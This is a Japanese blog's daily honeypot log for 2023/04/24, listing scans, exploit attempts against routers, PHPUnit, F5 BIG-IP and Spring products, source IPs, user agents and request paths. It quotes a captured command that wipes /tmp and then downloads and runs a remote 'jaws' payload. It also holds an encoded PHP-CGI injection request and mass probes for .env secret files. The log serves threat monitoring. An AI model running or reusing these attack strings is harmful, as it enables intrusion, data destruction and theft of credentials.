2023/04/24 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/04/24分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
.jsへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:US

D-link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
112.124.42.80に関する不正通信

を確認しました。

Location:UK

F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
112.124.42.80に関する不正通信
5.199.162.166に関する不正通信
84.153.66.204に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 94.158.247.123/jaws;
sh /tmp/jaws

Location:SG

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
112.124.42.80に関する不正通信
5.188.210.227に関する不正通信
5.199.162.166に関する不正通信
84.153.66.204に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：215 (前日比：80)
US：総アクセス数：251 (前日比：169)
UK：総アクセス数：138 (前日比：49)
SG：総アクセス数：105 (前日比：-149)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.27.128.209	United States
1	3.36.101.48	United States
1	3.38.169.182	United States
1	3.110.213.118	United States
4	4.1.229.86	United States
2	4.14.70.9	United States
2	4.17.224.131	United States
1	5.188.210.227	Russia
1	13.208.35.31	United States
1	15.152.214.248	United States
1	15.165.45.154	United States
1	18.170.69.155	United States
1	18.198.26.71	United States
1	18.234.148.133	United States
1	20.55.58.5	United States
1	34.215.87.57	United States
1	35.88.216.9	United States
2	41.251.249.88	Morocco
19	43.154.141.71	Singapore
1	45.56.108.128	United States
1	45.79.172.21	United States
1	45.79.181.179	United States
1	45.83.64.236	Germany
2	45.88.66.237	Bulgaria
1	47.88.87.97	United States
1	47.254.25.10	United States
1	52.47.118.197	United States
1	54.255.248.9	United States
1	59.93.24.195	India
2	64.62.197.17	United States
4	64.85.173.196	United States
2	66.175.213.4	United States
4	67.129.123.70	United States
2	68.66.164.26	United States
1	71.127.254.129	United States
1	87.246.7.90	Bulgaria
4	89.114.94.207	Portugal
1	92.118.39.82	Romania
4	93.160.62.190	Denmark
5	95.214.27.131	Bulgaria
2	103.60.60.186	Singapore
1	104.192.0.50	United States
1	107.170.236.11	United States
2	118.201.94.238	Singapore
9	135.125.217.54	France
7	135.125.246.110	France
1	141.98.10.172	Lithuania
45	152.136.235.236	China
2	154.209.125.92	Seychelles
7	159.89.126.67	United States
7	159.203.25.85	United States
1	165.232.170.200	United States
1	167.94.138.124	United States
1	167.94.145.59	United States
1	167.94.146.57	United States
1	167.248.133.33	United States
7	170.64.173.35	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
3	172.105.128.12	United States
2	172.173.148.77	Germany
1	172.173.250.23	Germany
2	185.32.164.145	Russia
1	185.180.143.189	Portugal
2	188.119.51.126	Turkey
1	192.155.90.118	United States
1	192.241.192.5	United States
11	193.32.162.159	Romania
1	198.235.24.135	United States
1	198.235.24.231	United States
2	202.73.34.226	Singapore
2	206.226.64.150	United States
2	216.163.200.22	United States

UserAgent一覧

件数	UserAgent
68	`-`
1	`Go-http-client/1.1`
1	`Hello World`
1	`Mozila/5.0`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
5	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
19	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
62	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
15	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
22		`\x16\x03\x01`
36	GET	`/.env`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/__tests__/test-become/.env`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/blogs/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/cgi-bin/.env`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/.env`	HTTP/1.1
3	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
11	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/docs/.env`	HTTP/1.1
11	GET	`/favicon.ico`	HTTP/1.1
3	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
2	GET	`/redmine/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
3	GET	`/upl.php`	HTTP/1.1
1	GET	`/uploads/.env`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/wp-admin/.env`	HTTP/1.1
1	GET	`/www/.env`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
19	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/__tests__/test-become`	HTTP/1.1
1	POST	`/admin`	HTTP/1.1
1	POST	`/app/config`	HTTP/1.1
1	POST	`/audio`	HTTP/1.1
1	POST	`/backend`	HTTP/1.1
1	POST	`/blog`	HTTP/1.1
1	POST	`/blogs`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin`	HTTP/1.1
1	POST	`/client`	HTTP/1.1
1	POST	`/core`	HTTP/1.1
1	POST	`/docs`	HTTP/1.1
1	POST	`/local`	HTTP/1.1
1	POST	`/new`	HTTP/1.1
1	POST	`/old`	HTTP/1.1
1	POST	`/public`	HTTP/1.1
2	POST	`/redmine`	HTTP/1.1
1	POST	`/uploads`	HTTP/1.1
1	POST	`/vendor/laravel`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/wp-admin`	HTTP/1.1
1	POST	`/www`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.26.117.250	United States
1	3.37.175.223	United States
1	3.110.215.242	United States
1	4.154.83.105	United States
1	13.125.24.247	United States
1	13.208.237.138	United States
1	18.133.122.71	United States
1	20.55.58.5	United States
10	20.208.136.64	United States
1	34.212.176.87	United States
1	34.213.239.117	United States
1	35.88.25.245	United States
1	35.90.71.235	United States
1	37.221.92.199	Germany
142	43.156.162.31	Singapore
1	43.201.75.37	United States
1	45.55.0.15	United States
1	45.79.128.205	United States
3	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
1	45.88.66.237	Bulgaria
1	51.158.37.186	France
2	51.195.145.74	France
20	54.37.79.75	France
1	54.180.149.213	United States
1	54.196.136.236	United States
1	60.191.125.35	China
1	64.62.197.111	United States
1	64.62.197.119	United States
1	65.0.89.242	United States
1	66.175.213.4	United States
1	87.121.221.5	Bulgaria
1	92.118.39.82	Romania
2	92.255.85.183	Hong Kong
1	104.28.227.186	United States
2	109.237.98.226	Russia
1	112.86.12.67	China
1	117.196.18.121	India
1	141.98.10.172	Lithuania
2	154.209.125.92	Seychelles
2	162.142.125.216	United States
2	167.248.133.49	United States
2	170.64.166.144	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
1	172.105.128.11	United States
1	174.136.229.109	United States
1	179.43.177.243	Panama
1	185.180.143.50	Portugal
2	188.161.169.101	Palestine
10	193.32.162.159	Romania
2	193.35.18.251	Bulgaria
1	194.55.224.203	Bulgaria
1	198.44.136.143	United States
1	198.199.106.111	United States
1	205.210.31.9	United States
1	205.210.31.167	United States
1	208.67.105.145	United States
1	209.141.35.128	United States

UserAgent一覧

件数	UserAgent
23	`-`
1	`Go-http-client/1.1`
1	`Hello World`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0`
150	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
16	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
2	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
2		`\x03`
1		`\x16\x03\x01\x01H\x01`
14		`\x16\x03\x01`
2	GET	`/.env.development`	HTTP/1.1
2	GET	`/.env.dist`	HTTP/1.1
2	GET	`/.env.old`	HTTP/1.1
2	GET	`/.env.prod`	HTTP/1.1
2	GET	`/.env.production`	HTTP/1.1
2	GET	`/.env.project`	HTTP/1.1
2	GET	`/.env.save`	HTTP/1.1
43	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
2	GET	`/.json`	HTTP/1.1
3	GET	`/?phpinfo=1`	HTTP/1.1
3	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
2	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/agc/timeclock.php`	HTTP/1.1
1	GET	`/agent/timeclock.php`	HTTP/1.1
2	GET	`/api/.env`	HTTP/1.1
2	GET	`/app/.env`	HTTP/1.1
2	GET	`/application/.env`	HTTP/1.1
2	GET	`/apps/.env`	HTTP/1.1
2	GET	`/back/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
2	GET	`/cms/.env`	HTTP/1.1
3	GET	`/config.json`	HTTP/1.1
2	GET	`/core/.env`	HTTP/1.1
2	GET	`/cp/.env`	HTTP/1.1
3	GET	`/debug/default/view?panel=config`	HTTP/1.1
2	GET	`/development/.env`	HTTP/1.1
10	GET	`/dispatch.asp`	HTTP/1.1
2	GET	`/docker/.env`	HTTP/1.1
2	GET	`/enviroments/.env.production`	HTTP/1.1
2	GET	`/enviroments/.env`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/fedex/.env`	HTTP/1.1
3	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
3	GET	`/info.php`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
2	GET	`/live_env`	HTTP/1.1
2	GET	`/local/.env`	HTTP/1.1
3	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/private/.env`	HTTP/1.1
1	GET	`/ray`	HTTP/1.1
2	GET	`/rest/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
2	GET	`/script/.env`	HTTP/1.1
2	GET	`/shared/.env`	HTTP/1.1
2	GET	`/sources/.env`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
2	GET	`/system/.env`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
2	POST	`/.env.development`	HTTP/1.1
2	POST	`/.env.dist`	HTTP/1.1
2	POST	`/.env.old`	HTTP/1.1
2	POST	`/.env.prod`	HTTP/1.1
2	POST	`/.env.production`	HTTP/1.1
2	POST	`/.env.project`	HTTP/1.1
2	POST	`/.env.save`	HTTP/1.1
3	POST	`/.env`	HTTP/1.1
1	POST	//%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
2	POST	`/admin-app/.env`	HTTP/1.1
2	POST	`/api/.env`	HTTP/1.1
2	POST	`/app/.env`	HTTP/1.1
2	POST	`/application/.env`	HTTP/1.1
2	POST	`/apps/.env`	HTTP/1.1
2	POST	`/back/.env`	HTTP/1.1
7	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/cms/.env`	HTTP/1.1
2	POST	`/core/.env`	HTTP/1.1
2	POST	`/cp/.env`	HTTP/1.1
2	POST	`/development/.env`	HTTP/1.1
2	POST	`/docker/.env`	HTTP/1.1
2	POST	`/enviroments/.env.production`	HTTP/1.1
2	POST	`/enviroments/.env`	HTTP/1.1
2	POST	`/fedex/.env`	HTTP/1.1
2	POST	`/laravel/.env`	HTTP/1.1
2	POST	`/live_env`	HTTP/1.1
2	POST	`/local/.env`	HTTP/1.1
2	POST	`/private/.env`	HTTP/1.1
2	POST	`/rest/.env`	HTTP/1.1
2	POST	`/script/.env`	HTTP/1.1
2	POST	`/shared/.env`	HTTP/1.1
2	POST	`/sources/.env`	HTTP/1.1
2	POST	`/system/.env`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.8.20.6	United States
1	3.22.248.9	United States
1	3.38.136.84	United States
2	3.72.13.71	United States
1	3.72.53.114	United States
1	3.96.204.5	United States
1	3.120.38.14	United States
1	3.133.131.202	United States
1	13.51.167.103	United States
1	13.208.196.138	United States
1	13.209.88.122	United States
1	13.212.174.144	United States
1	13.232.1.4	United States
1	15.152.71.104	United States
1	15.152.158.81	United States
1	15.165.34.18	United States
1	15.165.43.169	United States
1	18.117.166.194	United States
1	18.197.144.77	United States
1	18.234.36.70	United States
1	27.124.12.21	Singapore
1	35.161.29.106	United States
1	35.164.222.69	United States
7	36.156.22.4	China
1	37.221.92.199	Germany
3	43.158.215.27	Singapore
1	45.79.128.205	United States
2	45.79.172.21	United States
1	45.79.181.104	United States
1	45.79.181.223	United States
2	45.79.181.251	United States
1	45.83.65.17	Germany
1	45.88.66.237	Bulgaria
2	45.143.201.62	Russia
26	51.79.29.48	Canada
1	52.29.227.31	United States
1	52.47.209.55	United States
1	54.205.148.25	United States
1	60.191.125.35	China
1	64.62.197.56	United States
1	64.62.197.60	United States
7	64.226.107.253	United States
1	65.1.86.218	United States
1	66.240.192.82	United States
1	79.124.62.106	Bulgaria
1	87.121.221.5	Bulgaria
2	90.151.171.106	Russia
2	90.151.171.108	Russia
3	92.118.39.82	Romania
1	107.170.229.6	United States
2	146.190.119.114	United States
1	152.89.196.211	Russia
2	154.209.125.92	Seychelles
2	161.35.190.246	United States
1	161.35.233.14	United States
1	162.243.136.9	United States
1	162.243.140.31	United States
2	167.94.138.50	United States
2	167.94.145.58	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
1	179.43.142.86	Panama
1	179.43.177.243	Panama
2	183.136.225.32	China
1	185.180.143.189	Portugal
10	193.32.162.159	Romania
1	193.35.18.244	Bulgaria
2	193.35.18.251	Bulgaria
1	198.235.24.45	United States
1	205.210.31.27	United States
1	211.154.194.21	China
1	220.179.75.25	China

UserAgent一覧

件数	UserAgent
37	`-`
3	`Hello World`
1	`Hello, world`
1	`Mozilla/5.0 (Linux; Android 7.0; LGMS428) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
1	`Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
4	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
6	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`
31	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Python-urllib/3.7`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
3		`\x03`
25		`\x16\x03\x01`
1		`\xff\xa2\xff`
1		`o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f`
